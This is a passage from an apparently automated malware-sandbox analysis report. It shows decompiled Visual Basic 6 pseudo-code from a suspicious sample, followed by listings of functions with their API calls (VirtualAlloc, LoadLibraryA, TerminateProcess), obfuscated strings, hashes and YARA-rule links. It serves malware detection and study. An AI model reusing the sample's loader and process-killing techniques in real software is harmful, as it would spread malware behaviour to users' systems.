				_t95 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v36, 0x60c952,  &_v40,  &_v48);
				_v64 = _t95;
				if(_v64 >= 0) {
					_v80 = _v80 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x402104);
					_push(_a4);
					_push(_v64);
					L004011F2();
					_v80 = _t95;
				}
				_v32 = _v48;
				L004011D4();
				L004011DA();
				_v60 =  *0x4010c8;
				L004011DA();
				_v52 = 0x2b299e;
				_v48 = 0x7eadd8;
				 *((intOrPtr*)(_t130 + 0xc)) =  *0x4010c0;
				 *((intOrPtr*)( *_a4 + 0x704))(_a4, L"o9YGH4XNtHpCBImXjLZ2nNt991",  &_v48,  &_v36,  &_v52, 0x335dba,  &_v36,  &_v60,  &_v40, 0x476f,  &_v44, 2,  &_v36,  &_v40);
				_v28 = _v44;
				L004011D4();
				_t112 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 2,  &_v36,  &_v40);
				asm("fclex");
				_v64 = _t112;
				if(_v64 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x2b4);
					_push(0x4020d4);
					_push(_a4);
					_push(_v64);
					L004011F2();
					_v84 = _t112;
				}
				_t115 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
				_v64 = _t115;
				if(_v64 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x402104);
					_push(_a4);
					_push(_v64);
					L004011F2();
					_v88 = _t115;
				}
				_v8 = 0;
				asm("wait");
				_push(E0040C034);
				return _t115;
			}


























                    0x0040be23
                    0x0040be32
                    0x0040be3c
                    0x0040be44
                    0x0040be47
                    0x0040be54
                    0x0040be5c
                    0x0040be67
                    0x0040be74
                    0x0040be7a
                    0x0040be7c
                    0x0040be83
                    0x0040be9f
                    0x0040be85
                    0x0040be85
                    0x0040be8a
                    0x0040be8f
                    0x0040be92
                    0x0040be95
                    0x0040be9a
                    0x0040be9a
                    0x0040beab
                    0x0040beb8
                    0x0040bed6
                    0x0040bedc
                    0x0040bee3
                    0x0040beff
                    0x0040bee5
                    0x0040bee5
                    0x0040beea
                    0x0040beef
                    0x0040bef2
                    0x0040bef5
                    0x0040befa
                    0x0040befa
                    0x0040bf06
                    0x0040bf13
                    0x0040bf23
                    0x0040bf2e
                    0x0040bf39
                    0x0040bf3e
                    0x0040bf45
                    0x0040bf71
                    0x0040bf85
                    0x0040bf8f
                    0x0040bf9d
                    0x0040bfad
                    0x0040bfb3
                    0x0040bfb5
                    0x0040bfbc
                    0x0040bfd8
                    0x0040bfbe
                    0x0040bfbe
                    0x0040bfc3
                    0x0040bfc8
                    0x0040bfcb
                    0x0040bfce
                    0x0040bfd3
                    0x0040bfd3
                    0x0040bfe4
                    0x0040bfea
                    0x0040bff1
                    0x0040c00d
                    0x0040bff3
                    0x0040bff3
                    0x0040bff8
                    0x0040bffd
                    0x0040c000
                    0x0040c003
                    0x0040c008
                    0x0040c008
                    0x0040c011
                    0x0040c018
                    0x0040c019
                    0x00000000

                    APIs
                    • __vbaChkstk.MSVBVM60(?,00401126), ref: 0040BE3C
                    • __vbaHresultCheckObj.MSVBVM60(00000000,004010D0,004020D4,0000014C), ref: 0040BE95
                    • __vbaStrCopy.MSVBVM60(00000000,004010D0,004020D4,0000014C), ref: 0040BEAB
                    • __vbaStrCopy.MSVBVM60(00000000,004010D0,004020D4,0000014C), ref: 0040BEB8
                    • __vbaHresultCheckObj.MSVBVM60(00000000,004010D0,00402104,000006FC), ref: 0040BEF5
                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040BF13
                    • __vbaStrCopy.MSVBVM60(?,?,00401126), ref: 0040BF23
                    • __vbaStrCopy.MSVBVM60(?,?,00401126), ref: 0040BF39
                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,002B299E,00335DBA,?,?,?,0000476F,?), ref: 0040BF9D
                    • __vbaHresultCheckObj.MSVBVM60(00000000,004010D0,004020D4,000002B4), ref: 0040BFCE
                    • __vbaHresultCheckObj.MSVBVM60(00000000,004010D0,00402104,000006F8), ref: 0040C003
                    Strings
                    • o9YGH4XNtHpCBImXjLZ2nNt991, xrefs: 0040BF78
                    • MNMtjbRHx4PbamJpWQ2180, xrefs: 0040BF1B
                    • jmScNPZCAAwKcVgBIo2X100, xrefs: 0040BEA3
                    • bqBgWjLCBrgJI06100, xrefs: 0040BEB0
                    • eqKIW9fmNogmTZ4tlGfq9pLYrWa2MF69OEa121, xrefs: 0040BF31
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: __vba$CheckCopyHresult$FreeList$Chkstk
                    • String ID: MNMtjbRHx4PbamJpWQ2180$bqBgWjLCBrgJI06100$eqKIW9fmNogmTZ4tlGfq9pLYrWa2MF69OEa121$jmScNPZCAAwKcVgBIo2X100$o9YGH4XNtHpCBImXjLZ2nNt991
                    • API String ID: 136807637-645893437
                    • Opcode ID: e164a2b189606a8831389660117d84bb35d13d4b55d18a24915d3d3119ff5a21
                    • Instruction ID: 519a5d37f5daf25abc16070865b238d90d8f52d6e4d3c1e414c6b7a1e94efcca
                    • Opcode Fuzzy Hash: e164a2b189606a8831389660117d84bb35d13d4b55d18a24915d3d3119ff5a21
                    • Instruction Fuzzy Hash: A061F471900209EFCB04DF95D985BEDBBB9FF08344F10807AFA05BA1A0D77999558F98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00313746, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15libraryCOMMON
                    Download Yara Rule
                    APIs
                    • LdrInitializeThunk.NTDLL(0031157A,?,00000000,?,00000017,0000035D,?,003139E3,?), ref: 0031376A
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: ninet.dll
                    • API String ID: 2994545307-2962335871
                    • Opcode ID: bce733e9210052c127451b0198ece1ace0de3648f7146aa2051b3cb6dbbe07d7
                    • Instruction ID: 389800b6e1893a5fd3700caaa487bf5dee36f1253db005d5b064e5a0d3b6d91b
                    • Opcode Fuzzy Hash: bce733e9210052c127451b0198ece1ace0de3648f7146aa2051b3cb6dbbe07d7
                    • Instruction Fuzzy Hash: B6D05B750446418FD619F714894BFCB77B0EB40740F04C47954438B962D730A61AD685
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403BB0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 458memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: E>
                    • API String ID: 4275171209-855000429
                    • Opcode ID: ee27a51529d553255a0e5df47d2404c385a02f42e3a73fd186ed247afbca5910
                    • Instruction ID: 543fa372f36628f1aa98f6d776eddfbd376170e5aaa6fc3331ea6e28a99fae3b
                    • Opcode Fuzzy Hash: ee27a51529d553255a0e5df47d2404c385a02f42e3a73fd186ed247afbca5910
                    • Instruction Fuzzy Hash: 1BD15ED5A2E703C5F49365B140C547154A4EEA735A5738BBB6B23728C2A33E934B328F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403BD9, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 454memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: E>
                    • API String ID: 4275171209-855000429
                    • Opcode ID: 0446e76972e4ae805771f5b609bd16d5e439379415fb27cc98bd81f862505f20
                    • Instruction ID: 84b2e7897ca596aa20df8bdb68045b0fdafeb33706d3ab2e5523f27a769e2b4a
                    • Opcode Fuzzy Hash: 0446e76972e4ae805771f5b609bd16d5e439379415fb27cc98bd81f862505f20
                    • Instruction Fuzzy Hash: 12D15ED5A2E703C5E49365B140C547154A4EEA735A5738BBB6B23728C2A33E834B328F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403B71, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 443memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: E>
                    • API String ID: 4275171209-855000429
                    • Opcode ID: e64d95a40eae4fb526f579c51eec530f5906d0643ca3436f07f69aebff6c7cd9
                    • Instruction ID: af1e297680ab8320f1ed8e5527f57ac378e85804eaefb24c808ebcf20a63a9a1
                    • Opcode Fuzzy Hash: e64d95a40eae4fb526f579c51eec530f5906d0643ca3436f07f69aebff6c7cd9
                    • Instruction Fuzzy Hash: AED16DD5A2E703C5F49365B100C547154A4EEA735A5778BBB6B23728C2A33E934B328F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403B92, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 433memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: E>
                    • API String ID: 4275171209-855000429
                    • Opcode ID: 26f10dfbc1307f69bcf1246f3b72baa601265359a04644874a380ae699791ebf
                    • Instruction ID: c8f70a2befe2d3146102092da247e2e55b70081f6e0450f15e50d42f34d72ca4
                    • Opcode Fuzzy Hash: 26f10dfbc1307f69bcf1246f3b72baa601265359a04644874a380ae699791ebf
                    • Instruction Fuzzy Hash: E8D15DD5A2E703C5F49365B140C547154A4EEA735A5738BBB6B23728C2A33E934B328F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403C22, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 424memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: E>
                    • API String ID: 4275171209-855000429
                    • Opcode ID: 02db33a40cf353f277c37ff4f3124bd6a638678aca36d017eecc8512ab8e823f
                    • Instruction ID: 74306f00ae095a0a012ff5a82744488db1a2801a940f629d53b5ef637f3963f5
                    • Opcode Fuzzy Hash: 02db33a40cf353f277c37ff4f3124bd6a638678aca36d017eecc8512ab8e823f
                    • Instruction Fuzzy Hash: 71D16ED5A2E703C5E49365B140C547154A4EEA735A5778BBB6B23728C2A33E834B328F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403C43, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 417memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: E>
                    • API String ID: 4275171209-855000429
                    • Opcode ID: 4b80e2e0caa3b95f96c809937c38ae4ec731e1d4142ce2401a60fc8fa7dc3e7d
                    • Instruction ID: d9f6b5232ee310b46ebbe91d7dd7da64dcf36d20b152a7469316f291c2d61c15
                    • Opcode Fuzzy Hash: 4b80e2e0caa3b95f96c809937c38ae4ec731e1d4142ce2401a60fc8fa7dc3e7d
                    • Instruction Fuzzy Hash: 3CD16DD5A2E703C6E49365B140C547154A4EEA735A5738BBB6B33728C2A33E434B328F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403C60, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 412memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: E>
                    • API String ID: 4275171209-855000429
                    • Opcode ID: 4d72eab112fdd6ca29f9f8429fb23e270fc36baa8f533c45541a997a3088f9e4
                    • Instruction ID: ae79caf80629b2eb956455962b1868e9496543efdf2276d5d486d4c223d9fa92
                    • Opcode Fuzzy Hash: 4d72eab112fdd6ca29f9f8429fb23e270fc36baa8f533c45541a997a3088f9e4
                    • Instruction Fuzzy Hash: 50D16DD5A2E703C5E49365B140C547154A4EEE735A5738BBB6B23728C2A33E434B328F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003106DE, Relevance: 3.3, APIs: 2, Instructions: 336COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 6c823f37bb0def3b49f0a928c4f5590c697967edb2a6eca59939ca9cd882032d
                    • Instruction ID: 543ca56b4940eec98e9945d91aab572a1758450f48b807dc3442e3710ccaca7e
                    • Opcode Fuzzy Hash: 6c823f37bb0def3b49f0a928c4f5590c697967edb2a6eca59939ca9cd882032d
                    • Instruction Fuzzy Hash: 8291C3246443059AEF3F39644CA97FE2255DF8E350FA9442AEC8AC7486CA75C8C78552
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00310745, Relevance: 3.3, APIs: 2, Instructions: 275COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ec50ff2c4064affe9dec5515f8d8545d1eaa1a180a57cbb2fac4a9c3fdc034ed
                    • Instruction ID: 3304b8350f31b5b10cdc1cadeeb3300d2b632ece87773e6a3db0be5ff41dde23
                    • Opcode Fuzzy Hash: ec50ff2c4064affe9dec5515f8d8545d1eaa1a180a57cbb2fac4a9c3fdc034ed
                    • Instruction Fuzzy Hash: 2171B221644305E9EF3F39644CB97FE1116DF8E360FEA452AECCA96486C675C8C78512
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00310778, Relevance: 3.3, APIs: 2, Instructions: 262COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ebd16933acb390b02d2a75d4713ba9debe5ce5728264f544e86bb46cc8f95447
                    • Instruction ID: ebff3128f4516e3bbdae1cfab3e236093f3cf81299371aec979919c0f7c77b10
                    • Opcode Fuzzy Hash: ebd16933acb390b02d2a75d4713ba9debe5ce5728264f544e86bb46cc8f95447
                    • Instruction Fuzzy Hash: 7471C221A44305E9EF3F39644CB97FE1116DF8E360FEA452BEC8A97486CA7588C78503
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003107AA, Relevance: 3.3, APIs: 2, Instructions: 256serviceCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0031481A: LoadLibraryA.KERNEL32(?,082962C8,?,003104E9,00000000,00000000,00000040,00000000,?), ref: 003148E9
                    • CloseServiceHandle.ADVAPI32(?,00000000,00000004), ref: 00310B52
                    • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 003129B5
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: CloseHandleLibraryLoadProcessServiceTerminate
                    • String ID:
                    • API String ID: 3893904122-0
                    • Opcode ID: c0c78f03f503900b427e4e744de2ee787678735cc4429d91ecb385060542a40c
                    • Instruction ID: e6be4286306a4e7d2f1d8b200341f20d22491968f2ed13efde2145a7c1c5b67e
                    • Opcode Fuzzy Hash: c0c78f03f503900b427e4e744de2ee787678735cc4429d91ecb385060542a40c
                    • Instruction Fuzzy Hash: CC61A324A44305E9EF3F39544CB97FE1116DF8E360FEA452AEC8A9748ACA75C8C78503
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003107F5, Relevance: 3.2, APIs: 2, Instructions: 241serviceCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0031481A: LoadLibraryA.KERNEL32(?,082962C8,?,003104E9,00000000,00000000,00000040,00000000,?), ref: 003148E9
                    • CloseServiceHandle.ADVAPI32(?,00000000,00000004), ref: 00310B52
                    • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 003129B5
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: CloseHandleLibraryLoadProcessServiceTerminate
                    • String ID:
                    • API String ID: 3893904122-0
                    • Opcode ID: 6fa35ddd9c3cd3bb89dadfe745b134589819168e5a3a51419e524b02570266c4
                    • Instruction ID: 58d36ce23b5276d54b3d315df031c765cfe5a9b3ab12821238c5a201f101ab57
                    • Opcode Fuzzy Hash: 6fa35ddd9c3cd3bb89dadfe745b134589819168e5a3a51419e524b02570266c4
                    • Instruction Fuzzy Hash: BE617024A44305E9EF3F39644CB97FE1116DF8E360FEA451BEC8A96496C675C8C78503
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0031085E, Relevance: 3.2, APIs: 2, Instructions: 220COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f62f9c68140feaeabb2c122767deddaa1a56a3a562d152579d6f2977842b1bfc
                    • Instruction ID: 066414f9a5a542c866c7ef7d6fdeef1cc902b46c226c9a0ae44c43f01245488b
                    • Opcode Fuzzy Hash: f62f9c68140feaeabb2c122767deddaa1a56a3a562d152579d6f2977842b1bfc
                    • Instruction Fuzzy Hash: B6519E24A44305E9EF3F39644CB97FE11569F8E360FEA451BEC8A9748AC675C8C78603
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0031087B, Relevance: 3.2, APIs: 2, Instructions: 216serviceCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0031481A: LoadLibraryA.KERNEL32(?,082962C8,?,003104E9,00000000,00000000,00000040,00000000,?), ref: 003148E9
                    • CloseServiceHandle.ADVAPI32(?,00000000,00000004), ref: 00310B52
                    • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 003129B5
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: CloseHandleLibraryLoadProcessServiceTerminate
                    • String ID:
                    • API String ID: 3893904122-0
                    • Opcode ID: afc80d15fdd007288979115a3e54ef728ebe2eb03113e9dc98f4ef0c169ce30f
                    • Instruction ID: 73828f4998b8e6ebe87de8f06166d257ff39f0d74d6211b8ad40599c87c1bcdf
                    • Opcode Fuzzy Hash: afc80d15fdd007288979115a3e54ef728ebe2eb03113e9dc98f4ef0c169ce30f
                    • Instruction Fuzzy Hash: ED519124A04305E9EF3F3A644CA97FE2256DF8E320FE9451BEC8A97595C675C8C78603
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003108CA, Relevance: 3.2, APIs: 2, Instructions: 204serviceCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0031481A: LoadLibraryA.KERNEL32(?,082962C8,?,003104E9,00000000,00000000,00000040,00000000,?), ref: 003148E9
                    • CloseServiceHandle.ADVAPI32(?,00000000,00000004), ref: 00310B52
                    • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 003129B5
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: CloseHandleLibraryLoadProcessServiceTerminate
                    • String ID:
                    • API String ID: 3893904122-0
                    • Opcode ID: bfdd7675a9a263f589ad184ad51bac0e1f45b5b2b21a2d574027683cebc0ca3e
                    • Instruction ID: d62c2e599b7c43ccca0cd485088443ca08e4d2b52c4fa035bcefb7bed7ecb535
                    • Opcode Fuzzy Hash: bfdd7675a9a263f589ad184ad51bac0e1f45b5b2b21a2d574027683cebc0ca3e
                    • Instruction Fuzzy Hash: F851B120A04305E9EF3F2A544CA97FE2256DF8E320FE9451BEC8A97499C675C8C78503
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404641, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 202memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: i
                    • API String ID: 4275171209-3865851505
                    • Opcode ID: 73597b8f3761b9d03b6766a84c310c6a8581d4b0ff8753a3e9516656f95d3388
                    • Instruction ID: c6b09f2b99b990514ffbca78edca35c2541b70a46a65939152e73e3d93820d41
                    • Opcode Fuzzy Hash: 73597b8f3761b9d03b6766a84c310c6a8581d4b0ff8753a3e9516656f95d3388
                    • Instruction Fuzzy Hash: 565159D5A2E703C6F493A1B040C15315090EED735A5738BBB5B23B28C2A33E925B369F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00310919, Relevance: 3.2, APIs: 2, Instructions: 185serviceCOMMON
                    Download Yara Rule
                    APIs
                    • CloseServiceHandle.ADVAPI32(?,00000000,00000004), ref: 00310B52
                    • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 003129B5
                      • Part of subcall function 0031481A: LoadLibraryA.KERNEL32(?,082962C8,?,003104E9,00000000,00000000,00000040,00000000,?), ref: 003148E9
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: CloseHandleLibraryLoadProcessServiceTerminate
                    • String ID:
                    • API String ID: 3893904122-0
                    • Opcode ID: 37e22b7abc1a04ec2a8ecf7d5dcf4890186f10b749a511f9b3f5dd68d4e6465d
                    • Instruction ID: 7e1b180a185249a2d372b81144774cfb013b4024def3e235a66cd4f58db2b7dc
                    • Opcode Fuzzy Hash: 37e22b7abc1a04ec2a8ecf7d5dcf4890186f10b749a511f9b3f5dd68d4e6465d
                    • Instruction Fuzzy Hash: 0251C224A04305E9EF3F29544CAD7FE1266DF8E360FEA451BEC8A9748AC675C8C78503
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0031097D, Relevance: 3.2, APIs: 2, Instructions: 163serviceCOMMON
                    Download Yara Rule
                    APIs
                    • CloseServiceHandle.ADVAPI32(?,00000000,00000004), ref: 00310B52
                    • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 003129B5
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: CloseHandleProcessServiceTerminate
                    • String ID:
                    • API String ID: 3808843656-0
                    • Opcode ID: 824429f0a954e5f9f8a782719c094cbdda625ed4afb47da9dfd762877b47e733
                    • Instruction ID: abb40f73b988b1e27c17587e1d4fbeeec96b7928bd8f030cf67896ab2336c8cc
                    • Opcode Fuzzy Hash: 824429f0a954e5f9f8a782719c094cbdda625ed4afb47da9dfd762877b47e733
                    • Instruction Fuzzy Hash: A841C324A44301E9EF3F29544CADBFE11569F8E360FEA451AEC8E964DAC675C8C78503
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003109B4, Relevance: 3.2, APIs: 2, Instructions: 150serviceCOMMON
                    Download Yara Rule
                    APIs
                    • CloseServiceHandle.ADVAPI32(?,00000000,00000004), ref: 00310B52
                    • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 003129B5
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: CloseHandleProcessServiceTerminate
                    • String ID:
                    • API String ID: 3808843656-0
                    • Opcode ID: fed3ff20856d89b4e73adcd6571518df2a1a7f8f8e81a14a8624aea37d287643
                    • Instruction ID: 7e9749364a90f0326212e069ee333bd6e9c27978c857936a953885ecd9d202fc
                    • Opcode Fuzzy Hash: fed3ff20856d89b4e73adcd6571518df2a1a7f8f8e81a14a8624aea37d287643
                    • Instruction Fuzzy Hash: 60417B24604705D9DF3F2A684CAD7FE2256DF4E310FE9451BEC8A9649ACB7AC8C78503
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003109E5, Relevance: 3.1, APIs: 2, Instructions: 144serviceCOMMON
                    Download Yara Rule
                    APIs
                    • CloseServiceHandle.ADVAPI32(?,00000000,00000004), ref: 00310B52
                    • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 003129B5
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: CloseHandleProcessServiceTerminate
                    • String ID:
                    • API String ID: 3808843656-0
                    • Opcode ID: 933665c531a741e84113facd97807535b2c7e1b4889c7f28da919660f6cd3fd9
                    • Instruction ID: 87f32786d7f6df0bb0b15535270093a5de9d5e04bcdc6951f529042e134ed506
                    • Opcode Fuzzy Hash: 933665c531a741e84113facd97807535b2c7e1b4889c7f28da919660f6cd3fd9
                    • Instruction Fuzzy Hash: AD41AE24604701D9DF3F2A684CAD7FE1156DF4E310FEA451BEC8A964CACA7AC8C78503
                    Uniqueness

                    Uniqueness Score: -1.00%

